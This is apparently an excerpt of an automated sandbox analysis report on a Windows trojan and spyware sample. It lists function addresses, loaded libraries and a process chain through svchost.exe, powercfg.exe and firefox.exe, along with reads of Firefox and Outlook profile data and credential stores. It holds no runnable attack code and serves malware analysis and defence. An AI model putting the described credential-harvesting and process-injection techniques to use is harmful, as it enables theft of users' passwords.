                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032FE3F05_2_032FE3F0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033902745_2_03390274
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033702C05_2_033702C0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_0338A1185_2_0338A118
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032E01005_2_032E0100
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033781585_2_03378158
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033B01AA5_2_033B01AA
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033A41A25_2_033A41A2
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033A81CC5_2_033A81CC
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033820005_2_03382000
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032F07705_2_032F0770
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033147505_2_03314750
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032EC7C05_2_032EC7C0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_0330C6E05_2_0330C6E0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032F05355_2_032F0535
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033B05915_2_033B0591
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033944205_2_03394420
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033A24465_2_033A2446
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_0339E4F65_2_0339E4F6
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033AAB405_2_033AAB40
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033A6BD75_2_033A6BD7
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032EEA805_2_032EEA80
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033069625_2_03306962
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032F29A05_2_032F29A0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033BA9A65_2_033BA9A6
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032F28405_2_032F2840
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032FA8405_2_032FA840
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032D68B85_2_032D68B8
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_0331E8F05_2_0331E8F0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03310F305_2_03310F30
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03392F305_2_03392F30
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03332F285_2_03332F28
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03364F405_2_03364F40
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_0336EFA05_2_0336EFA0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032FCFE05_2_032FCFE0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032E2FC85_2_032E2FC8
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033AEE265_2_033AEE26
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032F0E595_2_032F0E59
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03302E905_2_03302E90
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033ACE935_2_033ACE93
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033AEEDB5_2_033AEEDB
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_0338CD1F5_2_0338CD1F
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032FAD005_2_032FAD00
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03308DBF5_2_03308DBF
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032EADE05_2_032EADE0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032F0C005_2_032F0C00
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03390CB55_2_03390CB5
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032E0CF25_2_032E0CF2
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033A132D5_2_033A132D
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032DD34C5_2_032DD34C
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_0333739A5_2_0333739A
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032F52A05_2_032F52A0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033912ED5_2_033912ED
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_0330B2C05_2_0330B2C0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033BB16B5_2_033BB16B
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_0332516C5_2_0332516C
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032DF1725_2_032DF172
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032FB1B05_2_032FB1B0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033A70E95_2_033A70E9
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033AF0E05_2_033AF0E0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032F70C05_2_032F70C0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_0339F0CC5_2_0339F0CC
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033AF7B05_2_033AF7B0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033356305_2_03335630
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033A16CC5_2_033A16CC
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033A75715_2_033A7571
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_0338D5B05_2_0338D5B0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033B95C35_2_033B95C3
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033AF43F5_2_033AF43F
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032E14605_2_032E1460
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033AFB765_2_033AFB76
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_0330FB805_2_0330FB80
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03365BF05_2_03365BF0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_0332DBF95_2_0332DBF9
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03363A6C5_2_03363A6C
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033AFA495_2_033AFA49
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033A7A465_2_033A7A46
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03335AA05_2_03335AA0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_0338DAAC5_2_0338DAAC
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03391AA35_2_03391AA3
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_0339DAC65_2_0339DAC6
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033859105_2_03385910
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_0330B9505_2_0330B950
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032F99505_2_032F9950
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_0335D8005_2_0335D800
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032F38E05_2_032F38E0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033AFF095_2_033AFF09
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033AFFB15_2_033AFFB1
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032F1F925_2_032F1F92
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032B3FD25_2_032B3FD2
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032B3FD55_2_032B3FD5
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032F9EB05_2_032F9EB0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033A7D735_2_033A7D73
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033A1D5A5_2_033A1D5A
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_032F3D405_2_032F3D40
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_0330FDC05_2_0330FDC0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_03369C325_2_03369C32
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_033AFCF25_2_033AFCF2
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A721305_2_02A72130
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A6B2305_2_02A6B230
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A6D2305_2_02A6D230
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A6B3805_2_02A6B380
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A6B3C95_2_02A6B3C9
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A6B3775_2_02A6B377
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A6D0075_2_02A6D007
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A6D0105_2_02A6D010
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A757E05_2_02A757E0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A739D05_2_02A739D0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_02A8BDF05_2_02A8BDF0
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_0310E3885_2_0310E388
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_0310E4AD5_2_0310E4AD
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_0310D9085_2_0310D908
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: 5_2_0310E83C5_2_0310E83C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 275 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 56 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 99 times
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: String function: 00670AE3 appears 70 times
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: String function: 00678900 appears 42 times
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: String function: 00657DE1 appears 35 times
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: String function: 032DB970 appears 280 times
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: String function: 03337E54 appears 110 times
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: String function: 0336F290 appears 105 times
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: String function: 03325130 appears 58 times
                Source: C:\Windows\SysWOW64\powercfg.exeCode function: String function: 0335EA12 appears 86 times
                Source: wWXR5js3k2.exe, 00000000.00000003.1368366440.000000000396D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs wWXR5js3k2.exe
                Source: wWXR5js3k2.exe, 00000000.00000003.1366990523.00000000037C3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs wWXR5js3k2.exe
                Source: wWXR5js3k2.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@6/5
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006BA06A GetLastError,FormatMessageW,0_2_006BA06A
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006A81CB AdjustTokenPrivileges,CloseHandle,0_2_006A81CB
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006A87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_006A87E1
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006BB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_006BB333
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006CEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_006CEE0D
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006C83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_006C83BB
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_00654E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00654E89
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeFile created: C:\Users\user\AppData\Local\Temp\aut2D31.tmpJump to behavior
                Source: wWXR5js3k2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: powercfg.exe, 00000005.00000003.2075520065.0000000002EB5000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000003.2075386075.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2611913316.0000000002EB5000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2611913316.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2611913316.0000000002EE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: wWXR5js3k2.exeVirustotal: Detection: 64%
                Source: wWXR5js3k2.exeReversingLabs: Detection: 73%
                Source: unknownProcess created: C:\Users\user\Desktop\wWXR5js3k2.exe "C:\Users\user\Desktop\wWXR5js3k2.exe"
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\wWXR5js3k2.exe"
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeProcess created: C:\Windows\SysWOW64\powercfg.exe "C:\Windows\SysWOW64\powercfg.exe"
                Source: C:\Windows\SysWOW64\powercfg.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\wWXR5js3k2.exe"Jump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeProcess created: C:\Windows\SysWOW64\powercfg.exe "C:\Windows\SysWOW64\powercfg.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: wWXR5js3k2.exeStatic file information: File size 1326080 > 1048576
                Source: wWXR5js3k2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: wWXR5js3k2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: wWXR5js3k2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: wWXR5js3k2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: wWXR5js3k2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: wWXR5js3k2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: wWXR5js3k2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: powercfg.pdbGCTL source: svchost.exe, 00000002.00000003.1852599121.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1852713638.0000000002A2D000.00000004.00000020.00020000.00000000.sdmp, ycBMGRFRlht.exe, 00000004.00000002.2612973441.0000000000F68000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ycBMGRFRlht.exe, 00000004.00000000.1809965971.000000000041E000.00000002.00000001.01000000.00000005.sdmp, ycBMGRFRlht.exe, 00000008.00000000.1957819340.000000000041E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: wWXR5js3k2.exe, 00000000.00000003.1371523327.00000000036F0000.00000004.00001000.00020000.00000000.sdmp, wWXR5js3k2.exe, 00000000.00000003.1370169862.0000000003890000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793017531.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1886544115.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1886544115.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795048850.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000003.1888818959.0000000003100000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2613793846.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2613793846.000000000344E000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000005.00000003.1886495587.0000000002F2E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: wWXR5js3k2.exe, 00000000.00000003.1371523327.00000000036F0000.00000004.00001000.00020000.00000000.sdmp, wWXR5js3k2.exe, 00000000.00000003.1370169862.0000000003890000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1793017531.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1886544115.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1886544115.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795048850.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, powercfg.exe, 00000005.00000003.1888818959.0000000003100000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2613793846.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2613793846.000000000344E000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000005.00000003.1886495587.0000000002F2E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: powercfg.exe, 00000005.00000002.2611913316.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2614313409.00000000038DC000.00000004.10000000.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000000.1958596191.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2185627863.000000003B45C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: powercfg.exe, 00000005.00000002.2611913316.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2614313409.00000000038DC000.00000004.10000000.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000000.1958596191.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2185627863.000000003B45C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: powercfg.pdb source: svchost.exe, 00000002.00000003.1852599121.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1852713638.0000000002A2D000.00000004.00000020.00020000.00000000.sdmp, ycBMGRFRlht.exe, 00000004.00000002.2612973441.0000000000F68000.00000004.00000020.00020000.00000000.sdmp
                Source: wWXR5js3k2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: wWXR5js3k2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: wWXR5js3k2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: wWXR5js3k2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: wWXR5js3k2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_00654B37 LoadLibraryA,GetProcAddress,0_2_00654B37
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_0065C4C6 push A30065BAh; retn 0065h0_2_0065C50D
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_00678945 push ecx; ret 0_2_00678958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02614A5F push edx; retf 2_2_02614A60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0262D863 push edi; iretd 2_2_0262D86C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026051C0 pushad ; ret 2_2_026051CB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02618712 push ebp; iretd 2_2_0261871A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02624CB3 push edi; ret 2_2_02624CD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026164BD push ecx; ret 2_2_026164DD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0260D48E push cs; ret 2_2_0260D4BB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02603570 push eax; ret 2_2_02603572
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02614D03 push ss; ret 2_2_02614D04
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx2_2_030309B6
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeCode function: 4_2_02D6524B push ecx; ret 4_2_02D6526B
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeCode function: 4_2_02D5C21C push cs; ret 4_2_02D5C249
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeCode function: 4_2_02D610D6 push ebx; retf 4_2_02D610DB
